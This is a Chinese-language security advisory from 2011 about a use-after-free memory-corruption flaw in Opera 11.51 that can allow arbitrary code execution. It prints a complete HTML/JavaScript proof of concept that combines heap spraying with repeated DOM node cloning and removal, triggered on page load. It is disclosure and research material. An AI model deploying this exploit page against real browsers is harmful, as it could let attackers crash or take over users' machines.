发布日期：2011-10-24
更新日期：2011-10-24

受影响系统：

Opera Software Opera Web Browser 11.51

描述：

---

BUGTRAQ  ID: 50230

Opera为来自挪威的一个极为出色的浏览器，具有速度快、节省系统资源、订制能力强、安全性高以及体积小等特点，目前已经是最受欢迎的浏览器之一。

Opera浏览器在实现上存在远程内存破坏漏洞，可导致执行任意代码。

<*来源：Roberto Suggi Liverani
  
  链接：http://dl.packetstormsecurity.net/1110-exploits/opera-useafterfree.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html> <head> <script> function spray() { for(S="\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=[S.substr(22)+"\u4141\u4141"].join("") } function crash(){ // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Append Reference) obj = document.body.children[0].cloneNode(true) document.body.removeChild(document.body.children[0]) document.body.appendChild(obj) // Clone Object -> Remove Object - > Heap Spray obj = document.body.children[1].cloneNode(true) document.body.removeChild(document.body.children[1]); spray(); // if this is removed Opera won't crash } </script> </head> <body onload="crash();"> <em contenteditable="true">a</em> <strong contenteditable="true">a</strong> </body> </html>

建议：

---

厂商补丁：

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.opera.com/support/

浏览次数：2345
严重程度：0（网友投票）